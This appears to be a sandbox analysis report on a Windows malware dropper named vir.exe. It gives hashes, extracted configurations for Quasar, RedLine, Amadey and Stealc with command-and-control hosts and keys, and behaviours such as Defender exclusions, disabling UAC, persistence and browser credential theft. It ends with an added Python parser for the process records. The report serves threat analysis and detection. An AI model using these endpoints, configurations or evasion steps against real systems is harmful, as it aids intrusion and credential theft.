Resubmissions
26-12-2024 15:01  241226-sec6vayjgx  10
27-09-2024 10:28  240927-mh3m1sxgrm  10
18-08-2024 19:49  240818-yjmtqsthkm  10
18-08-2024 14:30  240818-rvdxmsxgjg  10
15-08-2024 23:29  240815-3g3jmawdnq  10
15-08-2024 23:15  240815-28syts1brg  10
15-08-2024 22:57  240815-2w8thszepa  10

Analysis
max time kernel: 231s
max time network: 211s
platform: windows10-2004_x64
resource: win10v2004-20240709-en
resource tags: arch:x64 arch:x86 image:win10v2004-20240709-en locale:en-us os:windows10-2004-x64 system
submitted: 29-07-2024 19:25
Behavioral task behavioral1: sample vir.exe, resource win7-20240708-en
Behavioral task behavioral2: sample vir.exe, resource win10v2004-20240709-en
General
Target: vir.exe
Size: 336.1MB
MD5: bc82ea785da1180a8a964b3e54ad106c
SHA1: 4c1952ce778455af8ed10dca7b9f77d7815e8d0a
SHA256: c283ed662a29c18b117ba63ac41cca356934c6a29a1eb66e30d8305637e3411b
SHA512: 62bf34d75e913a47185664a34555678d0b8c2cf03c9e922b0bdcb085713322bafba2bf396b43a4cda7e0be6d315aea027bba29c628fe561d01e3026b4e0b405b
SSDEEP: 6291456:72qVJw+odBeWFv1k4R4b0ewZkhT4ofHwJjvZDQPf2tLSkHZdHVeVF0oJ:yr+WeSWgfecGT4RjvqP85/A33
Malware Config

Extracted: quasar
1.4.1
romka
jozzu420-51305.portmap.host:51305
0445c342-b551-411c-9b80-cd437437f491
encryption_key: E1BF1D99459F04CAF668F054744BC2C514B0A3D6
install_name: Romilyaa.exe
log_directory: Logs
reconnect_delay: 3000
startup_key: Windows 10 Boot
subdirectory: SubDir

Extracted: redline
LogsDiller Cloud (TG: @logsdillabot)
51.195.145.80:14640

Extracted: amadey
4.41
0657d1
http://185.215.113.19
install_dir: 0d8f5eb8a7
install_file: explorti.exe
strings_key: 6c55a5f34bb433fbd933a168577b1838
url_paths: /Vi9leo/index.php

Extracted: stealc
dana
http://85.28.47.31
url_path: /5499d72b3a3e55be.php

Extracted: lumma

Signatures
Detect Umbral payload (3 IoCs)
resource | yara_rule
behavioral2/files/0x000700000002345e-206.dat | family_umbral
behavioral2/files/0x00070000000235d2-4190.dat | family_umbral
behavioral2/memory/5388-4198-0x0000021B0E3F0000-0x0000021B0E430000-memory.dmp | family_umbral
Modifies firewall policy service (3 TTPs, 1 IoCs)
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Services\SharedAccess\Parameters\FirewallPolicy\FirewallRules\C:\ = "1" | 6eoK9cmGaTaMPDXJDZ5cDxGS.exe
PrivateLoader
PrivateLoader is a downloader sold as a pay-per-install malware distribution service.
Quasar payload (2 IoCs)
resource | yara_rule
behavioral2/files/0x000700000002345a-202.dat | family_quasar
behavioral2/memory/6724-3491-0x0000000000F00000-0x0000000001224000-memory.dmp | family_quasar
RedLine
RedLine Stealer is a malware family written in C#, first appearing in early 2020.
RedLine payload (1 IoCs)
resource | yara_rule
behavioral2/memory/8696-4950-0x0000000000400000-0x0000000000452000-memory.dmp | family_redline
description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System\EnableLUA = "0" | powershell.exe

description | ioc | Process
Key created | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths | powershell.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\Users\Admin\AppData\Local\Temp\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\the.exe = "0" | powershell.exe
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" | 6eoK9cmGaTaMPDXJDZ5cDxGS.exe
Credentials from Password Stores: Credentials from Web Browsers (1 TTPs)
Malicious access or copy of the web browser credential store.
Blocklisted process makes network request (2 IoCs)
flow | pid | Process
84 | 2680 | mshta.exe
84 | 2680 | mshta.exe

pid | Process
4628 | powershell.exe
8604 | powershell.exe
9116 | powershell.exe
7052 | powershell.exe
7468 | powershell.exe
8348 | powershell.exe
4572 | powershell.exe
Downloads MZ/PE file
Manipulates Digital Signatures (1 TTPs, 2 IoCs)
Attackers can apply techniques such as changing the Authenticode and Cryptography registry keys so that their binary is treated as validly signed.
Modifies Windows Firewall (2 TTPs, 1 IoCs)
pid | Process
8564 | netsh.exe
Possible privilege escalation attempt (4 IoCs)
pid | Process
6556 | icacls.exe
6244 | takeown.exe
7384 | icacls.exe
6628 | takeown.exe
.NET Reactor protector (35 IoCs)
Detects an executable protected by an unregistered version of Eziriz's .NET Reactor.
Checks computer location settings (2 TTPs, 9 IoCs)
Looks up the country code configured in the registry, likely for geofencing.
description | ioc | Process
Key value queried | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation | Romilyaa.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation | vir.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation | cmd.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation | Romilyaa.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation | Romilyaa.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation | 6eoK9cmGaTaMPDXJDZ5cDxGS.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation | Romilyaa.exe
Key value queried | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\International\Geo\Nation | Romilyaa.exe
Drops startup file (4 IoCs)
description | ioc | Process
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\xqfhIBLcow03UtXSzFluBTfl.bat | jsc.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\ruteymsUDC4fJPGB6TQGZ3zX.bat | jsc.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\jiaMQhbcPj97ifWAfHPgMs8M.bat | jsc.exe
File created | C:\Users\Admin\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\k2nK6ys8h9T3qwp8WsbAKDrX.bat | jsc.exe
Executes dropped EXE (20 IoCs)
pid | Process
1568 | ProgressBarSplash.exe
2748 | Rover.exe
1052 | Google.exe
1928 | regmess.exe
6092 | 1.exe
4588 | 3.exe
1992 | WinaeroTweaker-1.40.0.0-setup.exe
5440 | WinaeroTweaker-1.40.0.0-setup.tmp
6724 | scary.exe
6732 | the.exe
6820 | wimloader.dll
7000 | Romilyaa.exe
6196 | ac3.exe
6508 | Romilyaa.exe
7832 | Romilyaa.exe
7736 | lx26s09UlZjAOugX3CvKdnQ3.exe
1592 | SWjzRG7RCalw924ufm5qL0sx.exe
5776 | 6eoK9cmGaTaMPDXJDZ5cDxGS.exe
6628 | Romilyaa.exe
3512 | Romilyaa.exe
Indirect Command Execution (1 TTPs, 3 IoCs)
Adversaries may abuse utilities that allow for command execution to bypass security restrictions that limit the use of command-line interpreters.
pid | Process
8276 | forfiles.exe
5280 | forfiles.exe
1724 | forfiles.exe
Loads dropped DLL (4 IoCs)
pid | Process
6092 | 1.exe
6092 | 1.exe
6092 | 1.exe
5440 | WinaeroTweaker-1.40.0.0-setup.tmp
Modifies file permissions (1 TTPs, 4 IoCs)
pid | Process
6628 | takeown.exe
6556 | icacls.exe
6244 | takeown.exe
7384 | icacls.exe
Reads user/profile data of web browsers (2 TTPs)
Infostealers often target stored browser data, which can include saved credentials etc.
resource | yara_rule
behavioral2/files/0x000700000002344a-174.dat | upx
behavioral2/files/0x000700000002346b-222.dat | upx
behavioral2/memory/4588-3408-0x0000000000B90000-0x00000000021B7000-memory.dmp | upx
behavioral2/memory/4588-3480-0x0000000000B90000-0x00000000021B7000-memory.dmp | upx
behavioral2/memory/6244-4124-0x0000000000400000-0x000000000083E000-memory.dmp | upx
behavioral2/memory/6244-4292-0x0000000000400000-0x000000000083E000-memory.dmp | upx

description | ioc | Process
Set value (int) | \REGISTRY\MACHINE\SOFTWARE\Microsoft\Windows Defender\Exclusions\Paths\C:\ = "1" | 6eoK9cmGaTaMPDXJDZ5cDxGS.exe
Checks installed software on the system (1 TTPs)
Looks up Uninstall key entries in the registry to enumerate software on the system.
Legitimate hosting services abused for malware hosting/C2 (1 TTPs, 13 IoCs)
flow | ioc
238 | raw.githubusercontent.com
249 | raw.githubusercontent.com
255 | raw.githubusercontent.com
305 | discord.com
306 | discord.com
145 | pastebin.com
243 | raw.githubusercontent.com
254 | raw.githubusercontent.com
143 | pastebin.com
150 | raw.githubusercontent.com
148 | raw.githubusercontent.com
248 | raw.githubusercontent.com
242 | raw.githubusercontent.com
Looks up external IP address via web service (4 IoCs)
Uses a legitimate IP lookup service to find the infected system's external IP.
flow | ioc
164 | ipinfo.io
165 | ipinfo.io
160 | api.myip.com
161 | api.myip.com
Obfuscated Files or Information: Command Obfuscation (1 TTPs)
Adversaries may obfuscate content during command execution to impede detection.
Password Policy Discovery (1 TTPs)
Attempt to access detailed information about the password policy used within an enterprise network.
AutoIT Executable (3 IoCs)
AutoIT scripts compiled to PE executables.
resource | yara_rule
behavioral2/files/0x0007000000023449-121.dat | autoit_exe
behavioral2/files/0x0007000000023443-169.dat | autoit_exe
behavioral2/files/0x000700000002344f-184.dat | autoit_exe
Drops file in System32 directory (4 IoCs)
description | ioc | Process
File opened for modification | C:\Windows\System32\GroupPolicy | 6eoK9cmGaTaMPDXJDZ5cDxGS.exe
File opened for modification | C:\Windows\System32\GroupPolicy\gpt.ini | 6eoK9cmGaTaMPDXJDZ5cDxGS.exe
File created | C:\Windows\System32\GroupPolicy\Machine\Registry.pol | 6eoK9cmGaTaMPDXJDZ5cDxGS.exe
File opened for modification | C:\Windows\System32\GroupPolicy\GPT.INI | 6eoK9cmGaTaMPDXJDZ5cDxGS.exe
Enumerates processes with tasklist (1 TTPs, 1 IoCs)
pid | Process
1000 | tasklist.exe
Sets desktop wallpaper using registry (2 TTPs, 1 IoCs)
description | ioc | Process
Set value (str) | \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\Control Panel\Desktop\WallPaper = "C:\\Users\\%username%\\Desktop\\t\\a\\bg.png" | reg.exe
Suspicious use of SetThreadContext (1 IoCs)
description | pid | Process | procid_target
PID 436 set thread context of 7512 | 436 | powershell.exe | 244
Drops file in Program Files directory (20 IoCs)
description | ioc | Process
File created | C:\Program Files\Winaero Tweaker\is-HVLAK.tmp | WinaeroTweaker-1.40.0.0-setup.tmp
File opened for modification | C:\Program Files\Winaero Tweaker\Elevator.exe | WinaeroTweaker-1.40.0.0-setup.tmp
File opened for modification | C:\Program Files\Winaero Tweaker\WinaeroTweaker_x86_64.dll | WinaeroTweaker-1.40.0.0-setup.tmp
File created | C:\Program Files\Winaero Tweaker\unins000.dat | WinaeroTweaker-1.40.0.0-setup.tmp
File created | C:\Program Files\Winaero Tweaker\is-N7PF8.tmp | WinaeroTweaker-1.40.0.0-setup.tmp
File created | C:\Program Files\Winaero Tweaker\is-RRDV0.tmp | WinaeroTweaker-1.40.0.0-setup.tmp
File created | C:\Program Files\Winaero Tweaker\is-FUJN0.tmp | WinaeroTweaker-1.40.0.0-setup.tmp
File opened for modification | C:\Program Files\Winaero Tweaker\WinaeroTweaker.exe | WinaeroTweaker-1.40.0.0-setup.tmp
File opened for modification | C:\Program Files\Winaero Tweaker\WinaeroTweakerHelper.exe | WinaeroTweaker-1.40.0.0-setup.tmp
File created | C:\Program Files\Winaero Tweaker\is-1ODSJ.tmp | WinaeroTweaker-1.40.0.0-setup.tmp
File created | C:\Program Files\Winaero Tweaker\is-42G9D.tmp | WinaeroTweaker-1.40.0.0-setup.tmp
File opened for modification | C:\Program Files\Winaero Tweaker\WinaeroControls.dll | WinaeroTweaker-1.40.0.0-setup.tmp
File created | C:\Program Files\Winaero Tweaker\is-URAE5.tmp | WinaeroTweaker-1.40.0.0-setup.tmp
File created | C:\Program Files\Winaero Tweaker\is-VQB0S.tmp | WinaeroTweaker-1.40.0.0-setup.tmp
File created | C:\Program Files\Winaero Tweaker\is-JK9SM.tmp | WinaeroTweaker-1.40.0.0-setup.tmp
File created | C:\Program Files\Winaero Tweaker\is-7E3SC.tmp | WinaeroTweaker-1.40.0.0-setup.tmp
File opened for modification | C:\Program Files\Winaero Tweaker\unins000.dat | WinaeroTweaker-1.40.0.0-setup.tmp
File created | C:\Program Files\SubDir\Romilyaa.exe | scary.exe
File opened for modification | C:\Program Files\SubDir\Romilyaa.exe | scary.exe
File opened for modification | C:\Program Files\Winaero Tweaker\WinaeroTweaker_i386.dll | WinaeroTweaker-1.40.0.0-setup.tmp
Detects Pyinstaller (1 IoCs)
resource | yara_rule
behavioral2/files/0x0007000000023628-4582.dat | pyinstaller
Enumerates physical storage devices (1 TTPs)
Attempts to interact with connected storage/optical drive(s).
Program crash (2 IoCs)
pid | pid_target | Process | procid_target
6200 | 4588 | WerFault.exe | 165
7408 | 1592 | WerFault.exe | 259
System Location Discovery: System Language Discovery (1 TTPs, 64 IoCs)
Attempts to gather information about the system language of a victim in order to infer the geographical location of that host.
System Network Configuration Discovery: Internet Connection Discovery (1 TTPs, 20 IoCs)
Adversaries may check for Internet connectivity on compromised systems.
pid | Process
7024 | PING.EXE
5144 | PING.EXE
3760 | PING.EXE
6212 | PING.EXE
6352 | PING.EXE
6200 | PING.EXE
8092 | PING.EXE
6096 | PING.EXE
1772 | PING.EXE
4776 | PING.EXE
456 | PING.EXE
8832 | PING.EXE
9148 | PING.EXE
8996 | cmd.exe
8380 | PING.EXE
640 | PING.EXE
5460 | PING.EXE
6412 | PING.EXE
1708 | PING.EXE
9032 | PING.EXE
NSIS installer (2 IoCs)
resource | yara_rule
behavioral2/files/0x0007000000023469-220.dat | nsis_installer_1
behavioral2/files/0x0007000000023469-220.dat | nsis_installer_2
Checks SCSI registry key(s) (3 TTPs, 3 IoCs)
SCSI information is often read in order to detect sandboxing environments.
description | ioc | Process
Key opened | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | SWjzRG7RCalw924ufm5qL0sx.exe
Key queried | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | SWjzRG7RCalw924ufm5qL0sx.exe
Key enumerated | \REGISTRY\MACHINE\SYSTEM\ControlSet001\Enum\SCSI | SWjzRG7RCalw924ufm5qL0sx.exe
Checks processor information in registry (2 TTPs, 8 IoCs)
Processor information is often read in order to detect sandboxing environments.
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\~Mhz | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\ProcessorNameString | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Signature | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\Update Revision | firefox.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0\VendorIdentifier | firefox.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\CentralProcessor\0 | firefox.exe
Delays execution with timeout.exe (4 IoCs)
pid | Process
3544 | timeout.exe
7612 | timeout.exe
7460 | timeout.exe
7532 | timeout.exe
Detects videocard installed (1 TTPs, 1 IoCs)
Uses WMIC.exe to determine the installed video card.
pid | Process
3564 | wmic.exe
Enumerates system info in registry (2 TTPs, 16 IoCs)
description | ioc | Process
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | xcopy.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemManufacturer | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | xcopy.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | xcopy.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | xcopy.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | xcopy.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | xcopy.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS\SystemProductName | msedge.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | xcopy.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | xcopy.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | chrome.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | xcopy.exe
Key value queried | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\Identifier | xcopy.exe
Key opened | \REGISTRY\MACHINE\HARDWARE\DESCRIPTION\System\BIOS | msedge.exe
Gathers network information (2 TTPs, 1 IoCs)
Uses a command-line utility to view the network configuration.
pid | Process
3304 | ipconfig.exe
Kills process with taskkill (5 IoCs)
pid | Process
2856 | taskkill.exe
6260 | taskkill.exe
6296 | taskkill.exe
6756 | taskkill.exe
6748 | taskkill.exe
\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\16\IEFixedFontName = "Vani" reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\24 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\34\IEPropFontName = "Iskoola Pota" reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\15 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\29\IEPropFontName = "Gadugi" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\30\IEFixedFontName = "Microsoft Yi Baiti" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\33\IEFixedFontName = "Times New Roman" reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\12 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\19\IEPropFontName = "Leelawadee UI" reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\25 reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\4 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\10\IEPropFontName = "Kokila" reg.exe Set value (str) 
\REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\18\IEPropFontName = "Kartika" reg.exe Key created \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\35 reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\4\IEFixedFontName = "Courier New" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\14\IEPropFontName = "Kalinga" reg.exe Set value (str) \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000\SOFTWARE\Microsoft\Internet Explorer\International\Scripts\27\IEFixedFontName = "Ebrima" reg.exe -
Modifies registry class 10 IoCs
description      ioc                                                                                                   Process
Key created      \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\psiphon\shell\open                3.exe
Key created      \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings                    cmd.exe
Key created      \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\psiphon                           3.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\psiphon\ = "URL:psiphon"          3.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\psiphon\URL Protocol              3.exe
Key created      \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\psiphon\shell\open\command        3.exe
Key created      \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\psiphon\shell                     3.exe
Set value (str)  \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\psiphon\shell\open\command\ = "\"C:\\Users\\Admin\\AppData\\Local\\Temp\\vir_0ac24ce5-6788-461d-8ff7-25fab73bfec7\\bloatware\\3.exe\" -- \"%1\""   3.exe
Key created      \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings                    firefox.exe
Key created      \REGISTRY\USER\S-1-5-21-2990742725-2267136959-192470804-1000_Classes\Local Settings                    cmd.exe
-
Runs net.exe
-
Runs ping.exe 1 TTPs 19 IoCs
PING.EXE (19 processes): PIDs 6096, 9148, 5144, 8832, 8380, 9032, 3760, 5460, 6352, 8092, 640, 6200, 7024, 4776, 456, 1708, 6212, 6412, 1772
-
Runs regedit.exe 1 IoCs
regedit.exe: PID 8456
-
Scheduled Task/Job: Scheduled Task 1 TTPs 17 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
schtasks.exe (17 processes): PIDs 7460, 7184, 6480, 4072, 6560, 7036, 4016, 8388, 6940, 5644, 6580, 5672, 6768, 6292, 5876, 4124, 8752
-
Suspicious behavior: EnumeratesProcesses 31 IoCs
pid   Process                             hits
1000  tasklist.exe                        2
1768  msedge.exe                          2
2316  msedge.exe                          2
5796  msedge.exe                          2
1076  identity_helper.exe                 2
5440  WinaeroTweaker-1.40.0.0-setup.tmp   2
436   powershell.exe                      3
7104  chrome.exe                          2
436   powershell.exe                      7
7468  powershell.exe                      3
5776  6eoK9cmGaTaMPDXJDZ5cDxGS.exe        2
7736  lx26s09UlZjAOugX3CvKdnQ3.exe        2
-
Suspicious behavior: GetForegroundWindowSpam 1 IoCs
ac3.exe: PID 6196
-
Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 10 IoCs
2316 msedge.exe (7 hits), 7104 chrome.exe (3 hits)
-
Suspicious use of AdjustPrivilegeToken 64 IoCs
Token (in the order recorded)                      pid   Process
SeDebugPrivilege                                   1000  tasklist.exe
SeDebugPrivilege                                   2856  taskkill.exe
SeDebugPrivilege                                   2748  Rover.exe
SeDebugPrivilege                                   6260  taskkill.exe
SeDebugPrivilege                                   6296  taskkill.exe
SeDebugPrivilege                                   6756  taskkill.exe
SeDebugPrivilege                                   6724  scary.exe
SeDebugPrivilege                                   7000  Romilyaa.exe
SeDebugPrivilege                                   436   powershell.exe
SeDebugPrivilege                                   6508  Romilyaa.exe
SeDebugPrivilege (x2)                              3028  firefox.exe
SeShutdownPrivilege + SeCreatePagefilePrivilege    7104  chrome.exe (7 pairs)
SeDebugPrivilege                                   7468  powershell.exe
SeDebugPrivilege                                   7512  jsc.exe
SeShutdownPrivilege + SeCreatePagefilePrivilege    7104  chrome.exe (1 pair)
SeDebugPrivilege                                   7832  Romilyaa.exe
SeShutdownPrivilege + SeCreatePagefilePrivilege    7104  chrome.exe (13 pairs)
SeDebugPrivilege                                   6628  Romilyaa.exe
SeShutdownPrivilege + SeCreatePagefilePrivilege    7104  chrome.exe (3 pairs)
-
Suspicious use of FindShellTrayWindow 64 IoCs
2316 msedge.exe (x25), 5692 efsui.exe (x3), 5440 WinaeroTweaker-1.40.0.0-setup.tmp, 7000 Romilyaa.exe, 6508 Romilyaa.exe, 3028 firefox.exe (x21), 7104 chrome.exe (x12)
-
Suspicious use of SendNotifyMessage 64 IoCs
2316 msedge.exe (x24), 5692 efsui.exe (x3), 7000 Romilyaa.exe, 6508 Romilyaa.exe, 3028 firefox.exe (x20), 7104 chrome.exe (x15)
-
Suspicious use of SetWindowsHookEx 3 IoCs
4588 3.exe (x2), 3028 firefox.exe
-
Suspicious use of WriteProcessMemory 64 IoCs
parent (pid, image)   -> child pid   procid_target   records
2192 vir.exe          -> 1568        89              3
2192 vir.exe          -> 1188        91              3
1188 cmd.exe          -> 4224        93              3
1188 cmd.exe          -> 1960        94              3
1188 cmd.exe          -> 640         97              3
1960 cmd.exe          -> 3304        98              3
4224 cmd.exe          -> 3044        99              3
1960 cmd.exe          -> 4544        100             3
4544 net.exe          -> 3724        101             3
4224 cmd.exe          -> 4440        102             3
1960 cmd.exe          -> 1940        103             3
1940 net.exe          -> 3732        104             3
4224 cmd.exe          -> 1716        105             3
1960 cmd.exe          -> 1000        106             3
1188 cmd.exe          -> 2856        109             3
1188 cmd.exe          -> 384         110             3
1188 cmd.exe          -> 2316        112             2
1188 cmd.exe          -> 4784        113             3
2316 msedge.exe       -> 3896        114             2
1188 cmd.exe          -> 2748        115             3
1188 cmd.exe          -> 4012        117             2
4012 msedge.exe       -> 4612        119             2
2316 msedge.exe       -> 4268        122             2
-
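Each "wrote to memory of" record above names the parent, the child and the parent's image, and is repeated two or three times per child because the parent writes into the new process more than once while setting it up; read that way, the list is a process-creation log that matches the process tree later in the report. The following is an added example (not code from this report or from any tool it names) that parses records in exactly this notation, collapses the repeats into a count, and prints the parent/child tree. The sample is a subset of the report's own records, joined on one line as they were extracted.

```python
"""Rebuild the parent/child tree from the report's WriteProcessMemory records.

Added example; not code from the sandbox report or from any tool it names.
Record notation (one record, repeated per write):
  PID <parent> wrote to memory of <child> <parent> <parent image> <target id>
"""
import re
from collections import defaultdict

# The back-reference (?P=parent) checks that the 'pid' column agrees with the
# parent named in the description; records that do not agree are skipped.
RECORD_RE = re.compile(
    r"PID (?P<parent>\d+) wrote to memory of (?P<child>\d+) "
    r"(?P=parent) (?P<image>\S+) (?P<target>\d+)")

# Subset of the report's records, each repeated the number of times the
# report lists it, in the report's order.
SAMPLE = (
    "PID 2192 wrote to memory of 1568 2192 vir.exe 89 " * 3
    + "PID 2192 wrote to memory of 1188 2192 vir.exe 91 " * 3
    + "PID 1188 wrote to memory of 4224 1188 cmd.exe 93 " * 3
    + "PID 1188 wrote to memory of 1960 1188 cmd.exe 94 " * 3
    + "PID 4224 wrote to memory of 3044 4224 cmd.exe 99 " * 3
    + "PID 1960 wrote to memory of 4544 1960 cmd.exe 100 " * 3
    + "PID 4544 wrote to memory of 3724 4544 net.exe 101 " * 3
    + "PID 1188 wrote to memory of 2316 1188 cmd.exe 112 " * 2
    + "PID 2316 wrote to memory of 3896 2316 msedge.exe 114 " * 2
)


def parse_records(text):
    """Collapse repeated records into {(parent, child, image, target): count},
    preserving first-seen order."""
    edges = {}
    for m in RECORD_RE.finditer(text):
        key = (int(m["parent"]), int(m["child"]), m["image"], int(m["target"]))
        edges[key] = edges.get(key, 0) + 1
    return edges


def process_tree(text):
    """One indented line per process, roots first. A process whose image
    never appears (it spawned nothing in the records) is shown as '?'."""
    edges = parse_records(text)
    children, names = defaultdict(list), {}
    for (parent, child, image, _target), writes in edges.items():
        children[parent].append((child, writes))
        names.setdefault(parent, image)
    spawned = {child for (_p, child, _i, _t) in edges}
    roots = [pid for pid in names if pid not in spawned]
    out = []

    def walk(pid, depth, writes=None):
        label = f"{pid} {names.get(pid, '?')}"
        if writes is not None:
            label += f" ({writes} writes)"
        out.append("  " * depth + label)
        for child, n in children.get(pid, []):
            walk(child, depth + 1, n)

    for root in roots:
        walk(root, 0)
    return out


if __name__ == "__main__":
    print("\n".join(process_tree(SAMPLE)))
```

Children that never spawn anything (1568, 3044, 3724, 3896 in the sample) have no image name in these records; the process tree section of the report supplies it, so joining the two by PID completes the picture.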
Uses Task Scheduler COM API 1 TTPs
The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.
-
Views/modifies file attributes 1 TTPs 1 IoCs
attrib.exe: PID 5284
